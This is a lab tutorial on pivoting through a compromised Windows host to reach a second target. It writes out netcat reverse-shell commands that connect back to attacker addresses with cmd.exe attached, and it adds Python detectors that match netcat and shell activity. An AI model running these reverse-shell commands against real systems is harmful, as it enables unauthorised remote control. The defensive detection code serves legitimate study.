Pivoting Without Metasploit To Get Reverse Shell
Introduction
Pivoting is a crucial step in penetration testing and red teaming, allowing you to move from an initial compromised host to other hosts on the network. In this article, we will explore pivoting without using Metasploit, focusing on obtaining a reverse shell. We will use a lab environment with three machines: an attacker machine (Kali Linux), a 1st hacked machine (Windows 10), and a target machine (Windows 7).
Lab Environment
Our lab environment consists of three machines:
- Attacker Machine (Kali Linux): 192.168.1.81
- 1st Hacked Machine (Windows 10): 10.10.10.130
- Target Machine (Windows 7): 10.10.10.135
Step 1: Initial Compromise
The first step is to compromise the 1st hacked machine (Windows 10). This can be achieved through various means, such as exploiting a vulnerability, using a phishing attack, or exploiting a misconfigured service. For the purpose of this exercise, let's assume we have already compromised the 1st hacked machine.
Step 2: Establishing a Reverse Shell
Once we have compromised the 1st hacked machine, we need to establish a reverse shell to the attacker machine (Kali Linux). A reverse shell is a type of shell that connects back to the attacker machine, allowing us to interact with the compromised host remotely.
To establish a reverse shell, we can use a tool like nc (Netcat) or python -c. Here's an example of how to use nc to establish a reverse shell. On the attacker machine (Kali Linux), start a listener:
nc -lvnp 4444
This will start a listener on port 4444, waiting for a connection from the 1st hacked machine.
On the 1st hacked machine, we can use the following command to connect back to the attacker machine:
nc 192.168.1.81 4444 -e cmd.exe
This will establish a reverse shell to the attacker machine, allowing us to interact with the compromised host remotely.
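From the defender's side, the command above leaves two distinct traces on the compromised host: a process-creation record whose command line carries Netcat's -e flag with a shell as its argument, and a network-connection record in which a shell or netcat binary (rather than a browser or service) owns an outbound socket to an unusual port. The following Python is an added example, not code from the article: it runs three such checks over constructed Sysmon-style events (host name WIN10-PIVOT, paths and the allowlisted ports are assumptions) that mirror the article's lab, where the pivot host connects out to 192.168.1.81:4444.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry in the shape of Sysmon process-creation (EventID 1)
# and network-connection (EventID 3) records, trimmed to the fields the checks use.
# Hosts and ports mirror the article's lab: the pivot host connects out to the
# attacker listener at 192.168.1.81:4444. The host name WIN10-PIVOT is hypothetical.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WIN10-PIVOT", "pid": 4120, "image": r"C:\Tools\nc.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "nc 192.168.1.81 4444 -e cmd.exe"},
    {"id": 3, "host": "WIN10-PIVOT", "pid": 4120, "image": r"C:\Tools\nc.exe",
     "dst_ip": "192.168.1.81", "dst_port": 4444},
    {"id": 1, "host": "WIN10-PIVOT", "pid": 4133, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Tools\nc.exe", "cmdline": "cmd.exe"},
    {"id": 3, "host": "WIN10-PIVOT", "pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "10.10.10.10", "dst_port": 443},
    {"id": 1, "host": "WIN10-PIVOT", "pid": 4200, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# Ports a workstation is expected to talk to: a constructed allowlist, tune per environment.
EXPECTED_PORTS = {53, 80, 443, 445}

# Netcat's -e flag names a program to attach to the socket; a shell there is the
# reverse-shell pattern the article describes.
EXEC_FLAG = re.compile(r"(^|\s)-e\s+\S*(cmd\.exe|powershell|pwsh|sh)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path ('' when the field is missing)."""
    return PureWindowsPath(path).name.lower()


def check_event(ev):
    """Return the (rule, detail) pairs that a single event triggers."""
    hits = []
    name = basename(ev.get("image", ""))
    if ev["id"] == 1:
        cmdline = ev.get("cmdline", "")
        if EXEC_FLAG.search(cmdline):
            hits.append(("netcat_exec_flag", cmdline))
        parent = basename(ev.get("parent_image", ""))
        # A shell whose parent is a netcat binary is the other half of the same pattern.
        if name in SHELLS and parent in NETCAT_NAMES:
            hits.append(("shell_spawned_by_netcat", f"{parent} -> {name}"))
    elif ev["id"] == 3:
        # A shell or netcat binary owning an outbound socket to an unexpected port.
        if name in NETCAT_NAMES | SHELLS and ev["dst_port"] not in EXPECTED_PORTS:
            hits.append(("shell_or_netcat_outbound",
                         f"{name} -> {ev['dst_ip']}:{ev['dst_port']}"))
    return hits


def scan(events):
    """Run every event through check_event and collect findings with host/pid context."""
    findings = []
    for ev in events:
        for rule, detail in check_event(ev):
            findings.append({"host": ev["host"], "pid": ev["pid"],
                             "rule": rule, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']} pid={f['pid']} {f['rule']}: {f['detail']}")
```

On the constructed sample, the first three events fire one rule each and the two benign events (svchost.exe to 443, cmd.exe launched from Explorer) stay quiet. The exec-flag check is cheap to evade by renaming the binary, which is why the parent/child and socket-owner checks are kept alongside it: all three have to be dodged at once.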
Step 3: Pivoting to the Target Machine
Now that we have established a reverse shell to the 1st hacked machine, we can pivot to the target machine (Windows 7). To do this, we need to obtain a new IP address on the target machine's network.
We can use the ipconfig command to obtain the IP address of the target machine:
ipconfig
This will display the IP address of the target machine, which we can use to connect to it.
Step 4: Establishing a New Reverse Shell
Once we have obtained the IP address of the target machine, we can establish a new reverse shell to the attacker machine. We can use the same nc command to establish a new listener on a different port, this time on the 1st hacked machine (10.10.10.130), since that is the address the target machine will connect to:
nc -lvnp 5555
On the target machine, we can use the following command to connect back to the attacker machine:
nc 10.10.10.130 5555 -e cmd.exe
This will establish a new reverse shell to the attacker machine, allowing us to interact with the target machine remotely.
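The pivot in Steps 3 and 4 has a network signature of its own, independent of what runs on the hosts: a workstation (10.10.10.130) that holds an outbound session to an address outside its segment on an unusual port, and at the same time accepts a connection from a peer workstation (10.10.10.135) on another unusual port. The following Python is an added example, not part of the article: it correlates constructed flow records (NetFlow or Zeek conn-log style, with the 10.10.10.5 file server, the service-port list and the monitored segment as assumptions) and reports each origin -> relay -> external chain it finds, plus the lower-severity peer-to-peer connections that have no outbound partner.

```python
import ipaddress

# Constructed flow records (source, destination, destination port), in the shape a
# NetFlow/Zeek conn summary gives after aggregating by 5-tuple. Addresses follow
# the article's lab: the 10.10.10.0/24 segment holds the pivot host (10.10.10.130)
# and the target (10.10.10.135); 192.168.1.81 is the attacker box outside that
# segment. 10.10.10.5 is a hypothetical file server; .140/.150 are filler hosts.
FLOWS = [
    {"src": "10.10.10.130", "dst": "192.168.1.81", "dport": 4444},
    {"src": "10.10.10.135", "dst": "10.10.10.130", "dport": 5555},
    {"src": "10.10.10.135", "dst": "10.10.10.5", "dport": 445},
    {"src": "10.10.10.130", "dst": "10.10.10.5", "dport": 445},
    {"src": "10.10.10.140", "dst": "10.10.10.5", "dport": 445},
    {"src": "10.10.10.140", "dst": "10.10.10.150", "dport": 8080},
]

INTERNAL = ipaddress.ip_network("10.10.10.0/24")          # the monitored segment
KNOWN_SERVERS = {"10.10.10.5"}                             # hosts expected to accept peers
SERVICE_PORTS = {22, 53, 80, 135, 139, 443, 445, 3389}     # ordinary service ports (tune)


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL


def classify(flows):
    """Split flows into suspicious outbound sessions (keyed by the internal source)
    and suspicious lateral sessions (keyed by the internal host that accepted them)."""
    outbound, lateral = {}, {}
    for f in flows:
        src_in, dst_in = is_internal(f["src"]), is_internal(f["dst"])
        odd_port = f["dport"] not in SERVICE_PORTS
        if src_in and not dst_in and odd_port:
            outbound.setdefault(f["src"], []).append(f)
        elif src_in and dst_in and f["dst"] not in KNOWN_SERVERS and odd_port:
            lateral.setdefault(f["dst"], []).append(f)
    return outbound, lateral


def find_pivot_chains(flows):
    """A host that both holds an outbound session to an outside address on an odd
    port and accepts a peer workstation's connection on an odd port looks like a
    relay. Return one record per origin -> relay -> external chain."""
    outbound, lateral = classify(flows)
    chains = []
    for relay, inbound in lateral.items():
        for ext in outbound.get(relay, []):
            for lat in inbound:
                chains.append({
                    "origin": lat["src"], "relay": relay, "relay_port": lat["dport"],
                    "external": ext["dst"], "external_port": ext["dport"],
                })
    return chains


def find_lateral_only(flows):
    """Lower severity: peer-to-peer connections on odd ports whose receiving host
    has no matching outbound session. Worth a look, but not a relay on their own."""
    outbound, lateral = classify(flows)
    return [f for relay, fs in lateral.items() if relay not in outbound for f in fs]


if __name__ == "__main__":
    for c in find_pivot_chains(FLOWS):
        print(f"PIVOT {c['origin']} -> {c['relay']}:{c['relay_port']}"
              f" -> {c['external']}:{c['external_port']}")
    for f in find_lateral_only(FLOWS):
        print(f"lateral {f['src']} -> {f['dst']}:{f['dport']}")
```

On the constructed flows the only chain reported is 10.10.10.135 -> 10.10.10.130:5555 -> 192.168.1.81:4444, and the 10.10.10.140 -> 10.10.10.150:8080 connection is listed separately as lateral-only. The correlation is what makes the alert worth paging on: either half alone (an odd outbound port, or a workstation talking to a workstation) is common enough to be noise, while a host doing both at once is the relay shape that pivoting produces.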
Conclusion
In this article, we have explored pivoting without using Metasploit to obtain a reverse shell. We have used a lab environment with three machines: an attacker machine (Kali Linux), a 1st hacked machine (Windows 10), and a target machine (Windows 7). We have established a reverse shell to the 1st hacked machine and then pivoted to the target machine, establishing a new reverse shell to the attacker machine.
Additional Tips and Tricks
- Use a tool like nmap to scan the target machine's network and identify open ports.
- Use a tool like smbclient to access the target machine's shares.
- Use a tool like powershell to execute PowerShell commands on the target machine.
Common Mistakes to Avoid
- Failing to establish a reverse shell to the 1st hacked machine.
- Failing to obtain a new IP address on the target machine's network.
- Failing to establish a new reverse shell to the attacker machine.
Frequently Asked Questions
Q: What is pivoting in penetration testing?
A: Pivoting is a crucial step in penetration testing and red teaming, allowing you to move from an initial compromised host to other hosts on the network.
Q: Why do I need to establish a reverse shell to the 1st hacked machine?
A: Establishing a reverse shell to the 1st hacked machine allows you to interact with the compromised host remotely and perform further exploitation.
Q: How do I establish a reverse shell to the 1st hacked machine?
A: You can use a tool like nc (Netcat) or python -c to establish a reverse shell to the 1st hacked machine.
Q: What is the difference between a reverse shell and a bind shell?
A: A reverse shell connects back to the attacker machine, while a bind shell listens for a connection from the attacker machine.
Q: How do I pivot to the target machine?
A: To pivot to the target machine, you need to obtain a new IP address on the target machine's network and establish a new reverse shell to the attacker machine.
Q: What tools can I use to scan the target machine's network and identify open ports?
A: You can use a tool like nmap to scan the target machine's network and identify open ports.
Q: How do I access the target machine's shares?
A: You can use a tool like smbclient to access the target machine's shares.
Q: What are some common mistakes to avoid when pivoting without Metasploit?
A: Some common mistakes to avoid include failing to establish a reverse shell to the 1st hacked machine, failing to obtain a new IP address on the target machine's network, and failing to establish a new reverse shell to the attacker machine.
Q: How do I troubleshoot issues with pivoting without Metasploit?
A: You can use tools like tcpdump and wireshark to troubleshoot issues with pivoting without Metasploit.
Q: What are some best practices for pivoting without Metasploit?
A: Some best practices for pivoting without Metasploit include using a tool like nmap to scan the target machine's network and identify open ports, using a tool like smbclient to access the target machine's shares, and establishing a reverse shell to the 1st hacked machine before pivoting to the target machine.
Q: Can I use pivoting without Metasploit in a real-world scenario?
A: Yes, you can use pivoting without Metasploit in a real-world scenario, but it requires a good understanding of networking and system administration.
Q: How do I stay up-to-date with the latest pivoting techniques and tools?
A: You can stay up-to-date with the latest pivoting techniques and tools by following security blogs and attending security conferences.
Conclusion
Pivoting without using Metasploit requires a good understanding of networking and system administration. By following the steps outlined in this article and avoiding common mistakes, you can establish a reverse shell to a compromised host and then pivot to other hosts on the network. Remember to use a tool like nmap to scan the target machine's network and identify open ports, a tool like smbclient to access its shares, and to establish a reverse shell to the 1st hacked machine before pivoting to the target machine.